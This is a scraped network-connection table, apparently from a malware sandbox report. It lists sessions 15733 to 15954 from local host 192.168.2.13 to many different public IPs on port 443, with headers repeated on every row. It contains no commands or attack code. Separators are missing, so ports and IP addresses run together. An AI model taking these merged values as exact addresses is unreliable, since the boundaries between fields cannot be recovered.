                                                15733192.168.2.1347066138.76.169.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15734192.168.2.1348618128.116.250.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15735192.168.2.135385647.173.44.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15736192.168.2.1333990115.103.225.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15737192.168.2.1334756172.171.93.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15738192.168.2.1355868119.174.163.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15739192.168.2.1336480141.183.103.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15740192.168.2.135853458.207.130.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15741192.168.2.136051234.145.135.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15742192.168.2.1347858154.11.94.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15743192.168.2.1355354137.132.133.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15744192.168.2.1342632208.153.43.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15745192.168.2.1355324126.18.94.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15746192.168.2.135710878.205.28.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15747192.168.2.1360662180.18.245.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15748192.168.2.1359838168.187.107.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15749192.168.2.1334706113.120.19.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15750192.168.2.1354864169.84.243.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15751192.168.2.1351598211.192.9.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15752192.168.2.1344454116.158.124.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15753192.168.2.134479099.9.28.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15754192.168.2.133424453.140.59.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15755192.168.2.1352638213.219.58.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15756192.168.2.1335996105.227.114.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15757192.168.2.1349488120.253.40.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15758192.168.2.13374604.150.102.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15759192.168.2.1354224188.190.229.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15760192.168.2.1336934168.4.64.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15761192.168.2.1359512163.190.76.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15762192.168.2.1347748141.122.49.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15763192.168.2.13408749.73.187.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15764192.168.2.1339654116.94.231.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15765192.168.2.1346398173.3.215.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15766192.168.2.1357662125.136.186.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15767192.168.2.1344172125.194.163.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15768192.168.2.134498479.172.248.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15769192.168.2.1344634136.157.168.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15770192.168.2.1352048101.83.56.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15771192.168.2.134251445.168.186.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15772192.168.2.134988095.192.169.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15773192.168.2.1357634164.197.241.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15774192.168.2.136012446.81.226.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15775192.168.2.1349002111.245.51.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15776192.168.2.1345996164.250.99.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15777192.168.2.1337620191.194.118.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15778192.168.2.133792077.78.70.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15779192.168.2.1354272173.29.244.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15780192.168.2.13577004.143.145.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15781192.168.2.1357254196.171.141.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15782192.168.2.1356514204.50.141.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15783192.168.2.1341956137.72.23.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15784192.168.2.1351106124.251.107.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15785192.168.2.134857673.69.48.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15786192.168.2.134021427.253.131.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15787192.168.2.135695046.141.249.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15788192.168.2.1346246104.155.49.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15789192.168.2.1360934122.22.43.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15790192.168.2.135023845.192.140.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15791192.168.2.136095062.191.220.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15792192.168.2.1348756174.149.122.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15793192.168.2.13456204.21.248.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15794192.168.2.1343116104.200.157.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15795192.168.2.1348554209.80.99.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15796192.168.2.135745682.192.40.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15797192.168.2.1354560185.51.148.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15798192.168.2.1353084211.104.66.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15799192.168.2.1337128184.53.104.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15800192.168.2.1336204204.81.176.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15801192.168.2.1352056163.180.116.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15802192.168.2.135430665.112.137.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15803192.168.2.1357848142.39.157.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15804192.168.2.134559280.193.59.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15805192.168.2.134254049.112.82.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15806192.168.2.13581681.251.169.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15807192.168.2.1344922213.5.39.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15808192.168.2.1338132193.209.63.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15809192.168.2.1335210166.74.143.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15810192.168.2.1356846173.135.119.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15811192.168.2.134690617.55.58.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15812192.168.2.1352948114.223.183.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15813192.168.2.134878098.204.118.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15814192.168.2.136000850.28.219.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15815192.168.2.1345014124.111.130.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15816192.168.2.1341728169.247.145.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15817192.168.2.134042062.100.248.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15818192.168.2.134049250.171.33.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15819192.168.2.1345304166.15.110.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15820192.168.2.135898054.126.165.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15821192.168.2.1344110110.42.236.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15822192.168.2.1345356183.133.234.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15823192.168.2.1348886203.101.225.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15824192.168.2.1342448190.88.189.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15825192.168.2.13365882.123.125.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15826192.168.2.1342134135.28.205.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15827192.168.2.135795667.200.36.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15828192.168.2.1359054129.19.4.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15829192.168.2.135057699.213.205.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15830192.168.2.1354342176.56.30.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15831192.168.2.1341010157.223.109.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15832192.168.2.134728419.112.17.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15833192.168.2.1339734199.226.111.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15834192.168.2.1341932213.243.66.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15835192.168.2.134329839.45.251.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15836192.168.2.134408042.152.243.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15837192.168.2.1359478194.0.203.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15838192.168.2.1337840113.230.104.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15839192.168.2.1346170207.193.123.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15840192.168.2.133848646.122.69.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15841192.168.2.13420202.158.8.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15842192.168.2.1353632222.240.31.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15843192.168.2.135543474.58.148.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15844192.168.2.135963818.185.134.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15845192.168.2.134612040.238.208.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15846192.168.2.1354874147.153.110.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15847192.168.2.1341384117.48.154.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15848192.168.2.133473058.227.255.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15849192.168.2.1342330140.234.110.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15850192.168.2.1334588107.175.228.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15851192.168.2.1342280155.107.214.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15852192.168.2.1359358186.169.175.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15853192.168.2.1344398111.140.171.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15854192.168.2.1343720155.239.125.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15855192.168.2.133612851.15.227.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15856192.168.2.135338835.18.206.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15857192.168.2.1352124102.100.71.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15858192.168.2.1338958125.173.224.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15859192.168.2.1357852113.227.251.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15860192.168.2.1345806163.217.157.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15861192.168.2.1343840152.51.154.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15862192.168.2.1337112166.67.203.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15863192.168.2.1359782104.247.53.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15864192.168.2.1348600196.63.251.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15865192.168.2.1359340129.31.136.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15866192.168.2.1352440153.19.107.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15867192.168.2.135814227.144.59.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15868192.168.2.1356642141.229.2.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15869192.168.2.133377412.188.159.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15870192.168.2.1360118156.184.80.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15871192.168.2.1344282179.170.197.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15872192.168.2.1359652131.242.185.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15873192.168.2.135812625.252.46.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15874192.168.2.1358608200.94.136.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15875192.168.2.1354022180.225.45.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15876192.168.2.135447491.80.238.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15877192.168.2.134657264.46.110.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15878192.168.2.133566024.20.187.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15879192.168.2.1345824142.246.153.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15880192.168.2.134397646.145.72.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15881192.168.2.1338540107.182.30.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15882192.168.2.1347058107.176.230.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15883192.168.2.134953053.250.204.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15884192.168.2.1351616108.202.105.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15885192.168.2.134464866.229.79.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15886192.168.2.1339542210.113.145.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15887192.168.2.133329277.97.63.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15888192.168.2.1339036152.59.120.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15889192.168.2.1335818144.122.189.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15890192.168.2.1336272124.43.227.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15891192.168.2.1338858169.77.177.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15892192.168.2.1346542197.136.55.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15893192.168.2.135520292.173.143.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15894192.168.2.133516284.238.23.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15895192.168.2.1352244136.221.219.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15896192.168.2.136035476.243.1.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15897192.168.2.1350680154.223.209.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15898192.168.2.1345624142.4.34.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15899192.168.2.135710277.176.247.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15900192.168.2.13409004.4.254.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15901192.168.2.1335738126.57.179.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15902192.168.2.134736441.69.3.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15903192.168.2.135058263.159.61.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15904192.168.2.136029427.161.10.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15905192.168.2.1333444191.87.153.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15906192.168.2.135399235.151.77.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15907192.168.2.1354538191.75.196.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15908192.168.2.134244263.138.46.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15909192.168.2.1339212168.137.184.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15910192.168.2.1348168184.242.194.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15911192.168.2.1337762164.112.118.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15912192.168.2.133914083.168.44.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15913192.168.2.1347338179.223.63.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15914192.168.2.134133014.249.203.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15915192.168.2.1353350181.193.251.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15916192.168.2.1348760183.228.210.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15917192.168.2.135394638.101.18.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15918192.168.2.135703839.69.38.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15919192.168.2.1360066186.205.217.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15920192.168.2.134328249.185.233.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15921192.168.2.1356216130.83.165.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15922192.168.2.133575020.92.158.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15923192.168.2.1341730144.131.152.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15924192.168.2.1348074208.64.252.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15925192.168.2.1337448136.197.155.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15926192.168.2.1358962113.118.194.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15927192.168.2.1360862170.160.232.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15928192.168.2.133792061.48.87.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15929192.168.2.13367284.215.148.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15930192.168.2.1356084192.8.94.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15931192.168.2.1341478194.92.6.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15932192.168.2.1359930121.154.28.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15933192.168.2.134002231.156.254.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15934192.168.2.1351942124.160.12.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15935192.168.2.136053818.225.126.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15936192.168.2.1350844129.80.234.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15937192.168.2.134200691.68.175.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15938192.168.2.135774089.91.225.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15939192.168.2.1355318219.135.3.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15940192.168.2.135472676.16.212.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15941192.168.2.1355484163.211.108.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15942192.168.2.1358056177.59.189.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15943192.168.2.1349688223.36.160.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15944192.168.2.1355692145.148.6.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15945192.168.2.133522827.250.233.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15946192.168.2.135602061.165.40.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15947192.168.2.1341254102.117.144.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15948192.168.2.1353530166.49.215.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15949192.168.2.133725677.218.217.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15950192.168.2.133305223.217.21.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15951192.168.2.1333676204.130.109.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15952192.168.2.135744692.224.98.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15953192.168.2.135341846.197.53.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15954192.168.2.1337210115.111.24.162443
                                                TimestampBytes transferredDirectionData


